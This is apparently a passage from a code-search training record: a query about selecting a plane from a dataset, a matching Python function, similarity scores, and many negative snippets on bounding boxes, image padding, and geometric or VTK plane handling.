x\n index += 1\n index = 0\n for y in range(0, img.shape[0]+1, ystride):\n heightLimits[index] = y\n index+=1\n index = 0\n for i in range(len(widthLimits)-1):\n for j in range(len(heightLimits)-1):\n croppedImages[index] = img[heightLimits[j]:heightLimits[j+1], widthLimits[i]:widthLimits[i+1]]\n index += 1\n if bBoxes:\n for box in bBoxes:\n index = 0\n for i in range(len(widthLimits)-1):\n for j in range(len(heightLimits)-1):\n if box[0] >= widthLimits[i] and box[2] < widthLimits[i+1] \\\n and box[1] >= heightLimits[j] and box[3] < heightLimits[j+1]:\n box[0] -= widthLimits[i]\n box[2] -= widthLimits[i]\n box[1] -= heightLimits[j]\n box[3] -= heightLimits[j]\n croppedBoxes[index].append(box)\n index += 1\n return croppedImages, croppedBoxes", "def clip_range(x, xlim):\n return min([max([x, xlim[0]]), xlim[1]])", "def mgrid_box(X,axis=0,linj=200j,marg_rate=0.1):\n\n if len(X.shape)!=2:\n raise Exception('Only 2-D array is acceptable!')\n\n o_axis=1-axis\n\n X_max=np.max(X,axis=axis)\n X_min=np.min(X,axis=axis)\n lenX=X_max-X_min\n Marg_X=marg_rate*lenX\n X_edgmin, X_edgmax = X_min - Marg_X, X_max + Marg_X\n\n num=np.size(X,axis=o_axis)\n\n slices=[slice(X_edgmin[i],X_edgmax[i],linj) for i in np.arange(num)]\n zz=np.mgrid[slices] if axis==0 else np.array([i.T for i in np.mgrid[slices]])\n\n return zz", "def boundary(active, objects):\n limit = SIZE[1]\n for obj in objects:\n if active.pos_x == obj.pos_x:\n limit = min(limit, obj.pos_y)\n active.pos_y = limit-active.height\n active.col_d = True", "def check_extent(self):\n if self.lower_left.x > self.upper_right.x:\n dlx = self.lower_left.x\n self.lower_left.x = self.upper_right.x\n self.upper_right.y = dlx\n\n if self.lower_left.y > self.upper_right.y:\n dly = self.lower_left.y\n self.lower_left.y = self.upper_right.y\n self.upper_right.y = dly", "def _align_toplevel_grid(self):\n\n # align origin with nearest multple of 128\n self.mins[0] -= self.mins[0] % 128\n self.mins[1] -= self.mins[1] % 128\n\n width = self.maxs[0] - self.mins[0]\n height = self.maxs[1] - self.mins[1]\n greatest_dim = max(width, height)\n nearest_pow_two = int(2 ** np.ceil(np.log2(greatest_dim)))\n width_adjustment = (nearest_pow_two - width)\n height_adjustment = (nearest_pow_two - height)\n\n self.maxs[0] += width_adjustment\n self.maxs[1] += height_adjustment", "def printLimits():\n print(\"MinX:\",Drawable._minX)\n print(\"MaxX:\",Drawable._maxX)\n print(\"MinY:\",Drawable._minY)\n print(\"MaxY:\",Drawable._maxY)", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def exclude_points(plot_data: PlotData,\n *data_keys: str,\n limits: dict[str, tuple[float, float]] | None,\n padding: float = 0.1) -> None:\n\n if limits is None:\n return\n\n combined_mask = None\n for data_key in data_keys:\n\n if data_key in limits:\n data_limits = limits[data_key]\n\n #Add padding to both sides of the limits\n data_limits = data_limits[0] - padding * (1 + abs(data_limits[0])), data_limits[1] + padding * (\n 1 + abs(data_limits[1]))\n\n mask = plot_data.get_mask(\n lambda x, data_limits=tuple(data_limits): np.logical_and(x > data_limits[0], x < data_limits[1]),\n data_key=data_key)\n\n if combined_mask is None:\n combined_mask = mask\n else:\n combined_mask = [x & y for x, y in zip(mask, combined_mask)]\n\n if combined_mask is not None:\n plot_data.mask_data(combined_mask)", "def get_bounds(self):\n return ([self.t_min] * self.dim,[self.t_max] * self.dim)", "def roi_y_offset():\n def r(x):\n return x & 0xFFF\n\n def w(x):\n return min(x, 0xFFF)\n return r, w", "def bbox(img):\n a = np.where(img != 0)\n bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])\n return bbox", "def pad_image(img_path, width, height, pad_type, value=(0, 0, 0)):\n\n\n\n def get_left_right(margin_width):\n if margin_width % 2 == 0:\n left = margin_width // 2\n right = margin_width // 2\n else:\n left = margin_width // 2\n right = margin_width // 2 + 1\n return left, right\n\n def get_top_bottom(margin_height):\n if margin_height % 2 == 0:\n top = margin_height // 2\n bottom = margin_height // 2\n else:\n top = margin_height // 2\n bottom = margin_height // 2 + 1\n return top, bottom\n \n img = cv2.imread(img_path)\n h, w, _ = img.shape\n img_ratio=h/w\n target_ratio=height/width\n margin_width = width - w\n margin_height = height - h\n # if h >= height and w >= width:\n margin_width = abs(margin_width)\n margin_height = abs(margin_height)\n if img_ratio<target_ratio:\n resize_image(img_path, width=width, type='scale')\n img = cv2.imread(img_path)\n _h, _w, _ = img.shape\n # print(\"new h:\",_h)\n # print(\"new w:\",_w)\n # print(\"t w:\",width)\n # print(\"t h:\",height)\n margin_height = height - _h\n top, bottom = get_top_bottom(margin_height)\n # print(top,bottom)\n img = cv2.copyMakeBorder(img, top, bottom, 0, 0, pad_type, value=value)\n\n else:\n resize_image(img_path, height=height, type='scale')\n img = cv2.imread(img_path)\n _h, _w, _ = img.shape\n margin_width = width - _w\n left, right = get_left_right(margin_width)\n img = cv2.copyMakeBorder(img, 0, 0, left, right, pad_type, value=value)\n\n # elif h <= height and w <= width:\n # img = cv2.resize(img, (width, height))\n # elif h >= height:\n # img = cv2.resize(img, (w, height))\n # h, w, _ = img.shape\n # left, right = get_left_right(margin_width)\n # img = cv2.copyMakeBorder(img, 0, 0, left, right, pad_type, value=value)\n # elif w >= width:\n # img = cv2.resize(img, (width, h))\n # h, w, _ = img.shape\n # top, bottom = get_top_bottom(margin_height)\n # img = cv2.copyMakeBorder(img, top, bottom, 0, 0, pad_type, value=value)\n cv2.imwrite(img_path, img)", "def fix_mtcnn_bb(max_y: int, max_x: int, bounding_box: List[int]) -> List[int]:\n x1, y1, dx, dy = bounding_box[:4]\n x2 = x1 + dx\n y2 = y1 + dy\n x1 = max(min(x1, max_x), 0)\n x2 = max(min(x2, max_x), 0)\n y1 = max(min(y1, max_y), 0)\n y2 = max(min(y2, max_y), 0)\n return [x1, y1, x2, y2]", "def square_clip(points, bounds):\n\n # Extact x y coordinates from cloud\n xy = points[[\"x\", \"y\"]]\n\n # Create masks for each axis\n x_in = (xy[\"x\"] >= bounds[0]) & (xy[\"x\"] <= bounds[2])\n y_in = (xy[\"y\"] >= bounds[1]) & (xy[\"y\"] <= bounds[3])\n stack = np.stack((x_in, y_in), axis=1)\n in_clip = np.all(stack, axis=1)\n\n return in_clip", "def render_limits(\n origin: tuple[float, float],\n size_in_inches: tuple[float, float],\n scale: float,\n) -> tuple[float, float, float, float]:\n min_x, min_y = origin\n max_x = min_x + size_in_inches[0] * scale\n max_y = min_y + size_in_inches[1] * scale\n return min_x, min_y, max_x, max_y" ]
[ "0.6500194", "0.6199433", "0.6105291", "0.60281", "0.59161913", "0.5894251", "0.585068", "0.58396924", "0.5810349", "0.5791982", "0.57880354", "0.5763434", "0.57571024", "0.57165116", "0.57111406", "0.5668063", "0.56606424", "0.565698", "0.56563175", "0.5641682", "0.5641682", "0.5638964", "0.56364", "0.56123", "0.55897206", "0.55895275", "0.5585547", "0.55576754", "0.55565083", "0.5540652", "0.5538314", "0.55299735", "0.5501345", "0.54981315", "0.5496357", "0.5494643", "0.54855037", "0.5480638", "0.54775983", "0.5473485", "0.5450655", "0.54462963", "0.54458404", "0.5435265", "0.54277134", "0.5421867", "0.5419986", "0.54100454", "0.53996915", "0.5380869", "0.53791785", "0.5378378", "0.5370269", "0.5349513", "0.5346833", "0.53359467", "0.5329483", "0.5327626", "0.53273755", "0.53272414", "0.5319824", "0.53167164", "0.5314584", "0.530918", "0.5309115", "0.5300062", "0.52999276", "0.52893806", "0.52870494", "0.5280889", "0.527967", "0.5278977", "0.52783126", "0.5277838", "0.52679056", "0.52640015", "0.52589744", "0.5256994", "0.52561224", "0.5255538", "0.5253938", "0.5248723", "0.52470756", "0.52440745", "0.5242262", "0.5232364", "0.5226393", "0.52263784", "0.5221833", "0.5221342", "0.5214343", "0.52119374", "0.5210906", "0.5203702", "0.52037007", "0.51971024", "0.5193768", "0.519165", "0.5182408", "0.5182092" ]
0.7511422
0
Select plane from dataset. Intended for use with e.g. plt.pcolor.
def get_plane(dset, xaxis, yaxis, slices, **kw): # Build quad meshes from sorted grids xgrid = dset.dims[xaxis][0][indices[xaxis]] ygrid = dset.dims[yaxis][0][indices[yaxis]] xorder = np.argsort(xgrid) yorder = np.argsort(ygrid) xmesh, ymesh = quad_mesh(xgrid[xorder], ygrid[yorder], **kw) # Select and arrange data data = dset[slices] if xi < yi: data = data.T data = data[yorder] data = data[:, xorder] return xmesh, ymesh, data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetPlane(plane):\r\n pass", "def plane(self):\n return plane(self.N, self.o)", "def get_plane(self, scalar, plane, pval):\n\n if plane == 'yz' or plane == 'zy':\n # z along rows, y along columns\n return scalar[:, pval, :]\n elif plane == 'xz' or plane == 'zx':\n # x along columns, z along rows\n return scalar[:, :, pval]\n elif plane == 'xy' or plane == 'yx':\n # x along rows, y along columns\n return scalar[pval, :, :]", "def plane(self):\r\n from lsst.analysis import utils\r\n return utils.fitplane(self.points, self.z)", "def get_plane(self, quantity, plane, pval):\n\n self.log.info('Retrieving plane for %s', quantity)\n scalar = self.get_scalar_quantity(quantity)\n if plane == 'yz' or plane == 'zy':\n # z along rows, y along columns\n return scalar[:, pval, :]\n elif plane == 'xz' or plane == 'zx':\n # x along columns, z along rows\n return scalar[:, :, pval]\n elif plane == 'xy' or plane == 'yx':\n # x along rows, y along columns\n return scalar[pval, :, :]", "def mesh_slicer(self, plane, opt):\n\n # get plane coefficients\n a = plane[0]\n b = plane[1]\n c = plane[2]\n\n # create vtk plane object\n VTKplane = vtk.vtkPlane()\n # for now we choose the center point as the point of rotation\n VTKplane.SetOrigin(self.mesh_poly.GetCenter())\n VTKplane.SetNormal(a, b, c)\n VTKplane.SetOrigin(self.epi_apex_node)\n\n # create cutter\n cutEdges = vtk.vtkCutter()\n cutEdges.SetInputData(self.mesh_poly)\n cutEdges.SetCutFunction(VTKplane)\n cutEdges.GenerateCutScalarsOn()\n cutEdges.SetValue(0, 0.5)\n\n # create renderer\n ren = vtk.vtkRenderer()\n ren.SetBackground(0.0, 0.0, 0.0)\n\n # create mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(cutEdges.GetOutputPort())\n\n # create actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(0.0, 0.0, 1.0)\n actor.GetProperty().SetLineWidth(2)\n\n # display apex point\n apexA = include_points(list(self.epi_apex_node), 1, 15, (0, 0, 1))\n\n if (opt == 'mesh'):\n meshMapper = vtk.vtkPolyDataMapper()\n meshMapper.SetInputData(self.mesh_poly)\n meshActor = vtk.vtkActor()\n meshActor.SetMapper(meshMapper)\n meshActor.GetProperty().SetColor(1.0, 0.0, 0.0)\n\n # generate renderer\n ren.AddActor(self.meshActor)\n ren.AddActor(actor)\n ren.AddActor(apexA)\n\n else:\n ren.AddActor(actor)\n ren.AddActor(apexA)\n\n # display\n vtk_show(ren)", "def __setPlaneName(self, data):\n item = self._item()\n if item is not None:\n for name, normal in self._PLANES.items():\n if data == name and normal is not None:\n item.setNormal(normal)", "def load_plane(image):\n pixels = image.getPrimaryPixels()\n return pixels.getPlane(0, 0, 0)", "def SetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_SetPlaneMode(self, *args)", "def setPlanePickable(self, obj, dictName):\n obj.sim.reparentTo(self.selectable)\n obj.sim.find('**/pPlane1').node().setIntoCollideMask(BitMask32.bit(1))\n obj.sim.find('**/pPlane1').node().setTag(dictName, obj.id)", "def _prepare_plane(self):\n verticies = [\n # main plane - note that the mainplane is scaled so the mat_plane\n # matrix will it transform to the correct coordinates\n -self.i_border[0]/self._scaling[0], self.i_border[1]/self._scaling[1],\n -self.i_border[0]/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n (self.o_wh[0]-self.i_border[0])/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n (self.o_wh[0]-self.i_border[0])/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n (self.o_wh[0]-self.i_border[0])/self._scaling[0], self.i_border[1]/self._scaling[1],\n -self.i_border[0]/self._scaling[0], self.i_border[1]/self._scaling[1],\n\n # coord plane\n 0, 0,\n 0, -self.o_wh[1],\n self.o_wh[0], -self.o_wh[1],\n self.o_wh[0], -self.o_wh[1],\n self.o_wh[0], 0,\n 0, 0,\n\n # axes\n 0, -self.o_wh[1], self.o_wh[0], -self.o_wh[1], #x\n 0, 0, 0, -self.o_wh[1], #y\n ]\n\n colors = [\n 1.0, 1.0, 1.0, 1.0, # outer box XXX Remove outer box...\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n .9, .9, .9, 9.0, # plot box\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n 0.0, 0.0, 0.0, 1.0, #lines\n 0.0, 0.0, 0.0, 1.0,\n 0.0, 0.0, 0.0, 1.0,\n 0.0, 0.0, 0.0, 1.0,\n ]\n\n self._fonts = []\n for u in range(1, self._unit_count[0]+1):\n verticies.append(self._unit_w[0]*u)\n verticies.append(-self.o_wh[1]+0.02)\n verticies.append(self._unit_w[0]*u)\n verticies.append(-self.o_wh[1]-0.02)\n colors += [0.0, 0.0, 0.0, 1.0]\n colors += [0.0, 0.0, 0.0, 1.0]\n self._fonts.append([\n '{:.2f}'.format(u*(self.i_axis[0]/self._unit_count[0])-self.i_origin[0]),\n (self._unit_w[0]*u+self.i_border[0]-0.05)*self._scaling[0],\n (-self.o_wh[1]+(self.i_border[3])*0.5)\n ])\n for u in range(0, self._unit_count[1]):\n verticies.append(0.02)\n verticies.append(-self._unit_w[1]*u)\n verticies.append(-0.02)\n verticies.append(-self._unit_w[1]*u)\n colors += [0.0, 0.0, 0.0, 1.0]\n colors += [0.0, 0.0, 0.0, 1.0]\n self._fonts.append([\n '{:.2f}'.format(self.i_axis[1]-u*self.i_axis[1]/self._unit_count[1]-self.i_origin[1]),\n (0.025)*self._scaling[0],\n (-(self._unit_w[1])*u-self.i_border[1]+0.01)*self._scaling[1]\n ])\n\n self._draw_plane_indicies = (0, 12)\n self._draw_line_indicies = (12, 4+self._unit_count[0]*2+self._unit_count[1]*2)\n\n # convert data into valid data format\n verticies = numpy.array(verticies, dtype=numpy.float32)\n colors = numpy.array(colors, dtype=numpy.float32)\n\n self._plane_vao = util.VAO()\n self._plane_vbo = util.VBO(2)\n\n with self._plane_vao:\n # plane verticies\n with self._plane_vbo.get(0):\n glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(verticies), verticies, GL_STATIC_DRAW)\n glVertexAttribPointer(self.plane_shader.attributeLocation('vertex_position'), 2, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(0)\n\n # place vertex colors\n with self._plane_vbo.get(1):\n glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(colors), colors, GL_STATIC_DRAW)\n glVertexAttribPointer(self.plane_shader.attributeLocation('vertex_color'), 4, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(1)", "def plane(self):\n return Plane(Point(0, self.evaluations.exposedWing.edges[2].point1.y, 0), Vector(0, 1, 0),\n hidden=True)", "def GetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_GetPlaneMode(self, *args)", "def filter_plane(img_plane):\n img_plane = despeckle_by_opening(img_plane)\n img_plane = pseudo_flatfield(img_plane)\n return img_plane", "def plane_2d(self, quantity, plane, pval, draw=False, fixed=None):\n self.log.info('Plotting plane')\n pval = int(pval)\n # x = np.arange(0, self.period, self.dx)\n # y = np.arange(0, self.period, self.dy)\n # z = np.arange(0, self.height + self.dz, self.dz)\n x = self.X\n y = self.Y\n z = self.Z\n # Get the scalar values\n freq = self.conf['Simulation']['params']['frequency']\n wvlgth = (consts.c / freq) * 1E9\n title = 'Frequency = {:.4E} Hz, Wavelength = {:.2f} nm'.format(\n freq, wvlgth)\n # Get the plane we wish to plot\n cs = self.get_plane(quantity, plane, pval)\n self.log.info('DATA SHAPE: %s' % str(cs.shape))\n show = self.conf['General']['show_plots']\n p = False\n sim_dir = os.path.expandvars(self.conf['General']['sim_dir'])\n if plane == 'yz' or plane == 'zy':\n labels = ('y [um]', 'z [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_yz_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(y, z, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)\n elif plane == 'xz' or plane == 'zx':\n labels = ('x [um]', 'z [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_xz_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(x, z, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)\n elif plane == 'xy' or plane == 'yx':\n labels = ('y [um]', 'x [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_xy_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(x, y, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)", "def slice_explorer(data, cmap='gray'):\n data_len = len(data)\n\n @interact(plane=(0, data_len-1), continuous_update=False)\n def display_slice(plane=data_len/2):\n fig, axis = plt.subplots(figsize=(20, 7))\n axis_3d = fig.add_subplot(133, projection='3d')\n show_plane(axis, data[plane], title='Plane {}'.format(plane), cmap=cmap)\n slice_in_3d(axis=axis_3d, shape=data.shape, plane=plane)\n plt.show()\n\n return display_slice", "def p(self):\n return 'Plane'", "def project_point_plane(point, plane):\n base, normal = plane\n normal = normalize_vector(normal)\n vector = subtract_vectors(point, base)\n snormal = scale_vector(normal, dot_vectors(vector, normal))\n return subtract_vectors(point, snormal)", "def PlotAirplane():\n airplane = vtkInterface.PolyData(planefile)\n airplane.Plot()", "def get_projection_point(self, point, plane, test=False):\n return point_on_plane_projection(point, plane, test=test)", "def SetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ConvertSurfaceToBezierBasis_SetPlaneMode(self, *args)", "def LoadAirplane():\n return vtkInterface.PolyData(planefile)", "def color_plane_png(plane, color, is_normalized):\n plane = plane.copy()\n cutoff = np.array([200, 200, 200])\n if is_normalized:\n cutoff = cutoff.astype(np.float32) / 255.0\n black_indices = np.all((plane[:, :, :3] <= cutoff), axis=2)\n plane[black_indices, :3] = color\n return plane", "def changeClippingPlane(self):\n dir = gp_Dir(0., 0., 1.)\n checkedButton = self.ui.buttonGroup.checkedButton()\n if checkedButton == self.ui.xRadioButton:\n dir = gp_Dir(1., 0., 0.)\n elif checkedButton == self.ui.yRadioButton:\n dir = gp_Dir(0., 1., 0.)\n elif checkedButton == self.ui.zRadioButton:\n dir = gp_Dir(0., 0., 1.)\n self._surface.UpdateClippingPlane(dir)", "def show_plane(axis, plane, cmap=\"gray\", title=None):\n axis.imshow(plane, cmap=cmap)\n axis.set_xticks([])\n axis.set_yticks([])\n\n if title:\n axis.set_title(title)\n\n return None", "def slice_in_3d(axis, shape, plane):\n Z = np.array([[0, 0, 0],\n [1, 0, 0],\n [1, 1, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 1, 1]])\n\n Z = Z * shape\n\n r = [-1, 1]\n\n X, Y = np.meshgrid(r, r)\n\n # plotting vertices\n axis.scatter3D(Z[:, 0], Z[:, 1], Z[:, 2])\n\n # list of sides' polygons of figure\n verts = [[Z[0], Z[1], Z[2], Z[3]],\n [Z[4], Z[5], Z[6], Z[7]],\n [Z[0], Z[1], Z[5], Z[4]],\n [Z[2], Z[3], Z[7], Z[6]],\n [Z[1], Z[2], Z[6], Z[5]],\n [Z[4], Z[7], Z[3], Z[0]],\n [Z[2], Z[3], Z[7], Z[6]]]\n\n # plotting sides\n axis.add_collection3d(\n Poly3DCollection(verts,\n facecolors=(0, 1, 1, 0.25),\n linewidths=1,\n edgecolors='darkblue')\n )\n\n verts = np.array([[[0, 0, 0],\n [0, 0, 1],\n [0, 1, 1],\n [0, 1, 0]]])\n verts = verts * shape\n verts += [plane, 0, 0]\n\n axis.add_collection3d(\n Poly3DCollection(verts,\n facecolors='magenta',\n linewidths=1,\n edgecolors='black')\n )\n\n axis.set_xlabel('plane')\n axis.set_ylabel('col')\n axis.set_zlabel('row')\n\n # auto-scale plot axes\n scaling = np.array([getattr(axis, 'get_{}lim'.format(dim))() for dim in 'xyz'])\n axis.auto_scale_xyz(*[[np.min(scaling), np.max(scaling)]] * 3)\n\n return None", "def test_selecting_points(self, data, selected_data, other_selected_data):\n assume(\n np.max(selected_data) < data.shape[0]\n and np.max(other_selected_data) < data.shape[0]\n )\n\n selected_data = set(selected_data)\n other_selected_data = set(other_selected_data)\n\n layer = Points(data)\n layer.mode = \"select\"\n layer.selected_data = selected_data\n assert layer.selected_data == selected_data\n\n # test switching to 3D\n layer._slice_dims(ndisplay=3)\n assert layer.selected_data == selected_data\n\n # select different points while in 3D mode\n layer.selected_data = other_selected_data\n assert layer.selected_data == other_selected_data\n\n # selection should persist when going back to 2D mode\n layer._slice_dims(ndisplay=2)\n assert layer.selected_data == other_selected_data\n\n # selection should persist when switching between between select and pan_zoom\n layer.mode = \"pan_zoom\"\n assert layer.selected_data == other_selected_data\n layer.mode = \"select\"\n assert layer.selected_data == other_selected_data\n\n # add mode should clear the selection\n layer.mode = \"add\"\n assert layer.selected_data == set()", "def fadePlane(self):\n global circle_group\n circle_group = VGroup()\n\n self.play(FadeOut(number_plane_1))\n\n circle_group.add(circ_main, dot_circ, line_circ, dot_center,\n graph_upper, graph_lower,\n radius_horiz, radius_horiz_end_dot, radius_ang, radius_ang_end_dot,\n central_angle, central_angle_label,\n small_tangent, small_tangent_end_dot ,\n dot_circ_copy, dropped_dot, dropped_perp, radius_horiz_ext,\n ptA, ptB, ptC, ptD, ptE)\n \n # self.play(circle_group.animate.shift(LEFT*5))", "def GetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ConvertSurfaceToBezierBasis_GetPlaneMode(self, *args)", "def plot_plane(unit_normal, x_array, y_array, fore):\n # print'unit normal = ', unit_normal\n z = (((unit_normal[0] * (fore[0] - x_array)) + (unit_normal[1] * (fore[1] - y_array))) / unit_normal[2]) + fore[2]\n # print 'plane numbers\\n', z\n return z", "def get_plane_of_points(\n self,\n normal_vector=\"z\",\n planar_coordinate=None,\n ):\n # Get results vectors\n if (normal_vector == \"z\"):\n x_flat = self.floris.grid.x_sorted_inertial_frame[0, 0].flatten()\n y_flat = self.floris.grid.y_sorted_inertial_frame[0, 0].flatten()\n z_flat = self.floris.grid.z_sorted_inertial_frame[0, 0].flatten()\n else:\n x_flat = self.floris.grid.x_sorted[0, 0].flatten()\n y_flat = self.floris.grid.y_sorted[0, 0].flatten()\n z_flat = self.floris.grid.z_sorted[0, 0].flatten()\n u_flat = self.floris.flow_field.u_sorted[0, 0].flatten()\n v_flat = self.floris.flow_field.v_sorted[0, 0].flatten()\n w_flat = self.floris.flow_field.w_sorted[0, 0].flatten()\n\n # Create a df of these\n if normal_vector == \"z\":\n df = pd.DataFrame(\n {\n \"x1\": x_flat,\n \"x2\": y_flat,\n \"x3\": z_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n if normal_vector == \"x\":\n df = pd.DataFrame(\n {\n \"x1\": y_flat,\n \"x2\": z_flat,\n \"x3\": x_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n if normal_vector == \"y\":\n df = pd.DataFrame(\n {\n \"x1\": x_flat,\n \"x2\": z_flat,\n \"x3\": y_flat,\n \"u\": u_flat,\n \"v\": v_flat,\n \"w\": w_flat,\n }\n )\n\n # Subset to plane\n # TODO: Seems sloppy as need more than one plane in the z-direction for GCH\n if planar_coordinate is not None:\n df = df[np.isclose(df.x3, planar_coordinate)] # , atol=0.1, rtol=0.0)]\n\n # Drop duplicates\n # TODO is this still needed now that we setup a grid for just this plane?\n df = df.drop_duplicates()\n\n # Sort values of df to make sure plotting is acceptable\n df = df.sort_values([\"x2\", \"x1\"]).reset_index(drop=True)\n\n return df", "def plane_distance(p, plane):\n x, y, z = p\n A, B, C, D = plane\n return A*x + B*y + C*z + D", "def __init__(self, obj, plane):\n self.obj = obj\n self.plane = plane\n self.plane_origin = plane[0]\n self.plane_normal = plane[1]\n self.distance_from_plane = np.dot((self.obj.vectors-self.plane[0]),\n self.plane[1])\n self.slice_points = []\n\n self.calculate_points()\n \n return None", "def topo_plane_paramEval(self, param):\n # Create an empty numpy array with the same number as pixels as the real data.\n self.topo_plane_fit_data = np.zeros((self.y_res, self.x_res))\n for y in range(0, self.y_res): # Iterate over the y-axis pixels.\n for x in range(0, self.x_res): # Iterate over the x-axis pixels.\n self.topo_plane_fit_data[y, x] = param[0]*x + param[1]*y + param[2] # Generate plane value.\n return self.topo_plane_fit_data # Return entire array.", "def invert_point_on_plane(point, plane):\n _, _, proj = project_point_to_plane(point, plane)\n\n u, v = proj[0][1]\n return u, v", "def plane_list(self):\n return self.__plane_list", "def test_point_on_plane(self, point, plane):\n _dist = point.dot(plane[:3]) + plane[3]\n if _dist <= epsilon:\n print('OK => point on plane')\n else:\n print('NO => point not on plane')", "def LinePlane(line):\n line = rhutil.coerceline(line, True)\n rc, plane = line.TryGetPlane()\n if not rc: return scriptcontext.errorhandler()\n return plane", "def closest_point_on_plane(point, plane):\n base, normal = plane\n x, y, z = base\n a, b, c = normalize_vector(normal)\n x1, y1, z1 = point\n d = a * x + b * y + c * z\n k = (a * x1 + b * y1 + c * z1 - d) / (a**2 + b**2 + c**2)\n return [x1 - k * a,\n y1 - k * b,\n z1 - k * c]", "def _constructClippingPlane( self, viewProj, positive, axis):\r\n if positive: scale = 1\r\n else: scale = -1\r\n\r\n return Plane(viewProj[0,3] + scale*viewProj[0, axis],\r\n viewProj[1,3] + scale*viewProj[1, axis],\r\n viewProj[2,3] + scale*viewProj[2, axis],\r\n viewProj[3,3] + scale*viewProj[3, axis] )", "def planes_3d(self, quantity, xplane, yplane):\n xplane = int(xplane)\n yplane = int(yplane)\n # Get the scalar values\n # Get the data on the plane with a fixed x value. These means we'll\n # have changing (y, z) points\n xdata = self.get_plane(quantity, 'yz', xplane)\n # z first cuz we want y to be changing before z to correspond with the\n # way numpy flattens arrays. Note this means y points will be in the\n # 2nd column\n xplanepoints = np.array(list(itertools.product(self.Z, self.Y)))\n xdata = xdata.flatten()\n xplanexval = np.array(list(itertools.repeat(x[xplane], len(xdata))))\n xplanedata = np.zeros((xplanepoints.shape[0], 4))\n xplanedata[:, 0] = xplanexval\n xplanedata[:, 1] = xplanepoints[:, 1]\n xplanedata[:, 2] = xplanepoints[:, 0]\n xplanedata[:, 3] = xdata\n # Same procedure for fixed y plane\n ydata = self.get_plane(quantity, 'xz', yplane)\n yplanepoints = np.array(list(itertools.product(z, x)))\n ydata = ydata.flatten()\n yplaneyval = np.array(list(itertools.repeat(y[yplane], len(ydata))))\n yplanedata = np.zeros((yplanepoints.shape[0], 4))\n yplanedata[:, 0] = yplanepoints[:, 1]\n yplanedata[:, 1] = yplaneyval\n yplanedata[:, 2] = yplanepoints[:, 0]\n yplanedata[:, 3] = ydata\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now stack them vertically and plot!\n all_data = np.vstack((xplanedata, yplanedata))\n self.scatter3d(all_data[:, 0], all_data[:, 1], all_data[:, 2],\n all_data[:, 3], labels, 'planes_3d')", "def plane_indexes_from(self, plane_index: int):\r\n if plane_index is None:\r\n return range(len(self.fit.tracer.planes))\r\n return [plane_index]", "def PlotAntsPlane():\n\n # load and shrink airplane\n airplane = vtkInterface.PolyData(planefile)\n airplane.points /= 10\n # pts = airplane.GetNumpyPoints() # gets pointer to array\n # pts /= 10 # shrink\n\n # rotate and translate ant so it is on the plane\n ant = vtkInterface.PolyData(antfile)\n ant.RotateX(90)\n ant.Translate([90, 60, 15])\n\n # Make a copy and add another ant\n 